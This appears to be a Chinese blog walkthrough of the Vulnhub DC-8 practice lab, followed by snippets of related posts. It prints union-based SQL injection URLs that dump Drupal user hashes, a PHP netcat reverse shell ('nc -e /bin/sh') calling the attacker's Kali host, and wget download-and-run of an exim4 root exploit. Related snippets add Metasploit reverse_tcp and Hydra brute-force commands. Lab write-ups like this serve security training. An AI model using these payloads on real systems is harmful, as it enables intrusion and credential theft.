Vulnhub靶机实战——DC-8

渗透测试实战:利用SQL注入获取靶机权限
最新推荐文章于 2022-06-22 01:15:53 发布
原创 最新推荐文章于 2022-06-22 01:15:53 发布 · 3.6k 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#DC-8 #靶机 #渗透测试

靶机DC-8下载地址: https://download.vulnhub.com/dc/DC-8.zip

环境:VMware 15虚拟机软件

         DC-8靶机IP地址:192.168.220.156

         Kali的IP地址:192.168.220.155

DC-8靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155

ip addr

使用nmap工具扫描192.168.220.0/24网段,查找存活主机,发现靶机dc8的IP地址:192.168.220.156

nmap -T4 -sP 192.168.220.0/24 -oN nmap220.sP

 

扫描dc8靶机开放的端口,发现已开放22(SSH)、80(HTTP)端口

nmap -A -T4 192.168.220.156 -p- -oN nmap156.A

使用whatweb指纹工具查看网站,发现使用Drupal CMS搭建的网站

whatweb http://192.168.220.156/ >> dc8-whatweb.txt
cat dc8-whatweb.txt

访问靶机网站

http://192.168.220.156/

点击网站欢迎页面左侧栏“Details”,发现地址栏出现页面id值,怀疑存在注入点,这里可以使用sqlmap工具自动跑注入出自己想要的数据,我手动注入!懒得跑sqlmap了

找到注入点测试后,发现是数字型注入,且当前页面使用的数据表只有一列,开始爆库

http://192.168.220.156/?nid=1’ --+

http://192.168.220.156/?nid=1 order by 1  --+

爆出当前使用的数据库名

http://192.168.220.156/?nid=-1 union select database()  --+

爆出数据库中的表名,找到一个users表应该是我们想要的表

http://192.168.220.156/?nid=-1 union select group_concat(table_name) from information_schema.tables where table_schema=database()   --+

爆users表中的列名,发现有name、pass列

http://192.168.220.156/?nid=-1 union select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'  --+

爆出users表中name、pass列的数据,爆出两个用户名admin和john及密码加密后的密文

http://192.168.220.156/?nid=-1 union select group_concat(name,':',pass) from users  --+

admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

将用户名和密码密文保存到dc8-hash.txt中

vim dc8-hash.txt

用户名有一个john,可能是要john工具爆破密码,这里直接使用john爆破,使用john的默认字典,爆出john的密码,admin的密码没有爆出

john dc8-hash.txt

john/turtle

使用john用户登录网站,成功登入,发现Contact Us 页面可以修改内容,修改此页面并写入php反弹shell代码

http://192.168.220.156/user/login

<p>GETSHELL</p>
<?php
system("nc -e /bin/sh 192.168.220.155  4567");
?>

代码写入保存后,kali监听4567端口,等待shell,在Contact Us页面随便输入信息点击Submit后,查看kali已得到shell

http://192.168.220.156/node/3
nc -lvvp 4567
python -c 'import pty;pty.spawn("/bin/bash")'

使用find命令查找具有suid权限的命令,找到一个exim4命令,exim是一款在Unix系统上使用的邮件服务,exim4在使用时具有root权限

find / -perm -u=s -type f 2>/dev/null

查看exim4当前版本号

/usr/sbin/exim4 –version

查找exim的漏洞攻击脚本,找到46996.sh脚本文件

searchsploit exim

将46996.sh拷贝到本地并改名,并在kali开启http服务

cp /usr/share/exploitdb/exploits/linux/local/46996.sh getShell.sh
cat getShell.sh
python -m SimpleHTTPServer

在靶机上将getShell.sh脚本文件下载到靶机本地,并给脚本赋予执行权限

wget http://192.168.220.155:8000/getShell.sh

chmod 777 getShell.sh

根据脚本提示,执行脚本文件并添加命令参数,执行后获取到root权限,并找到flag.txt文件

./getShell.sh -m netcat

VulnHubDC-8
weixin_39219503的博客
02-02 476
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-8,367/ 题目信息如下 DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challeng...
Vulnhub靶机实战——DC-1
冠霖L的博客
09-27 2119
靶机DC-1下载地址:https://download.vulnhub.com/dc/DC-1.zip 描述:靶机DC-1共有5个flag,并且需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.130 Kali的IP地址:192.168.220.131 本...
Vulnhub靶机实战——DC-6
冠霖L的博客
10-28 4036
靶机DC-6下载地址:https://download.vulnhub.com/dc/DC-6.zip 环境:VMware 15虚拟机软件 DC-6靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.142 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.142...
VulnHub DC8
baynk的博客
05-22 401
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-8,367/ 下载地址2:https://pan.baidu.com/s/17t3sSa-7w81OT_RH7jGhqw 提取码: nqf6 只有一个flag,但是要bypass双因子认证,看来有新东西,而且有提示和ssh有关。 开肝。 0x02 渗透流程 nmap走起 还是先从80入手,直接访问 又是drupal,这是真爱啊。上面的Very important Message提示要维护网站。点着点着
vulnhubDC8靶机
LainWith的博客
02-15 3110
目录介绍信息收集主机发现主机信息探测访问网站目录扫描漏洞发现手工SQL联合查询注入1. 判断列数,得知是1列2. 数据查询&信息收集(union select)3. 获取数据库的表名4. 查询指定表名下的列名信息5. 查询指定列获取数据6. 爆破密码反弹shell提权exim4提权拿到Flag 介绍 系列: DC(此系列共10台) 发布日期:2019年9月8日 难度:中级 Flag:此挑战的最终目标是绕过双因素身份验证,获取root权限并读取唯一的Flag 学习: sql注入 网站挂马 exim4
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2702
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
Vulnhub靶机实战——DC-5
冠霖L的博客
10-27 5128
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.145 DC-5靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.145 ...
Vulnhub靶机实战——DC-3
冠霖L的博客
09-27 9281
靶机DC-3下载地址:https://download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https://download.vulnhub.com/dc/DC-3VMware.zip 注:开始将DC-3.ova文件导入VMware虚拟机,发现无法获取到靶机IP地址,作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware,然...
Vulnhub靶机实战——DC-7
冠霖L的博客
10-29 5261
靶机DC-7下载地址:https://download.vulnhub.com/dc/DC-7.zip 环境:VMware 15虚拟机软件 DC-7靶机IP地址:192.168.220.154 Kali的IP地址:192.168.220.155 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155...
Vulnhub靶机实战——DC-4
冠霖L的博客
09-27 3317
靶机DC-4下载地址:https://download.vulnhub.com/dc/DC-4.zip 描述:从靶机DC-3开始,只有一个入口和一个最终的flag,只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境:Vmware 15 Pro虚拟机软件 DC-4靶机IP地址:192.168.220.138 Kali的IP地址:...
Vulnhub DC-8
Pai_Space
04-05 1076
明确:《中华人民共和国网络安全法》 Description DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of conce..
vulnhubdc8
qq_54030686的博客
06-22 543
各位小伙伴,可直接看这位师傅 个人写的很粗糙 DC8本身的难度较低,可以较为轻松地获取到目标权限,总体思路 主机发现,端口扫描,服务探测 一共开启2个端口,80和22端口,80端口开放的服务为drupal 7,打开界面进行检测,这里利用burpsuit联合xray进行检测 burpsuit的user option操作栏中设置自己闲置代理,运行xray即可,如下图所示这里使用bp自带的浏览器进行测试,然后在界面进行点击,每一个功能点都要点击下 点击到 该界面时候,xray检测到存在sql注入,直接上sqlma
vulnhub靶场,DC-8
kukudeshuo的博客
07-16 645
vulnhub靶场,DC-8 环境准备 攻击机:kali(192.168.58.130) 靶机DC-8(192.168.58.151) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan -l确定目标靶机 确定目标靶机IP为192.168.58.151 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80 浏览器访问目标靶机80端口 网站目录结构扫描 发现robots.txt文件,访问rob
vulnhub-dc8
ST0new的博客
10-21 780
目录vulnhub-dc80x00 下载地址0x01 环境0x02 复现 vulnhub-dc8 0x00 下载地址 DC-8 0x01 环境 kali:192.168.64.133 dc-8:192.168.64.155 0x02 复现 扫描端口 查看网站,查找有用信息 发现在访问时url处为nid=1 这种类型,可能存在sql注入,测试发现报错 获取用户名和密码 字段为1 数...
Vulnhub靶机实战-Warzone 1
黑白的博客
01-10 820
声明 好好学习,天天向上 搭建 使用virtualbox打开,网络配置和我的PRESIDENTIAL文章一样,是要vmware和virtualbox互连 渗透 存活扫描,发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.5 -p 1-65535 -oN nmap.A 开启端口 21,22,5000 以匿名用户登录ftp,发现了两个文件。 note里面提示请使用jar包加密密码 反编译一下jar包,用juid
Vulnhub靶机实战-Lampiao
黑白的博客
01-10 667
声明 好好学习,天天向上 搭建 使用virtualbox打开,网络和我的PRESIDENTIAL一样,是要vmware和virtualbox互连 渗透 存活扫描,发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.12 -p 1-65535 -oN nmap.A 开启端口 发现开启80,22,1898 访问80 http://192.168.239.12 80开了个寂寞 dirscan连接还有问题 看看18
Vulnhub靶机实战-HOGWARTS DOBBY
黑白的博客
01-10 603
声明 好好学习,天天向上 搭建 使用virtualbox打开,网络和我的PRESIDENTIAL一样,是要vmware和virtualbox互连 渗透 存活扫描,发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.8 -p 1-65535 -oN nmap.A 开启端口 发现开启80 访问80 http://192.168.239.6 F12查看源码,发现目录 访问 http://192.168.239.8
Vulnhub靶机实战-CH4INRULZ
黑白的博客
01-18 566
声明 好好学习,天天向上 搭建 使用vmware打开 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.180 -p 1-65535 -oN nmap.A 开启端口 发现开启21,22,80,8011 访问80 http://192.168.31.180 扫描web目录 python3 dirsearch.py -u 192.168.31.180 development中得登录 index中告诉我们还没开发完 剩下的没什么消息了 访问备份文
Vulnhub靶机实战-Billu_b0x
黑白的博客
01-10 577
声明 好好学习,天天向上 搭建 使用virtualbox打开,网络和我的PRESIDENTIAL一样,是要vmware和virtualbox互连 渗透 存活扫描,发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.14 -p 1-65535 -oN nmap.A 开启端口 发现开启80,22 访问80 http://192.168.239.14 熟悉的四个字母SQLi 试了一堆,试了个寂寞 vulnhub惯例
vulnhub靶机dc-1
最新发布
01-11
### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用,允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。 #### 获取与安装 为了开始体验DC-1靶机的任务,首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”,点击进入详情页面下载对应的镜像文件(OVA格式),之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。 #### 初始配置建议 启动后的DC-1默认会分配一个私有IP地址(例如:`192.168.x.x`),此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常;可以通过ping命令验证连通性状况良好后再继续后续操作。 #### 基础信息搜集阶段 当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况: ```bash nmap -A <target-ip> ``` 上述指令将会返回有关远程服务器运行状态的关键情报,为下一步制定针对性策略奠定坚实的基础。 #### 进阶探索与利用路径 随着对DC-1认识程度加深,接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知,成功建立Meterpreter回话意味着已经突破了初步防线,获得了更深层次的操作权限: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <local-ip> # Kali IP address exploit ``` 以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求,一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。 #### 密码破解辅助技巧 考虑到可能存在弱密码保护的情况,采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]: ```bash hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip> ``` 这里展示了针对FTP协议实施登录认证绕过的实例,当然具体应用场景还需视实际情况灵活调整参数选项。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值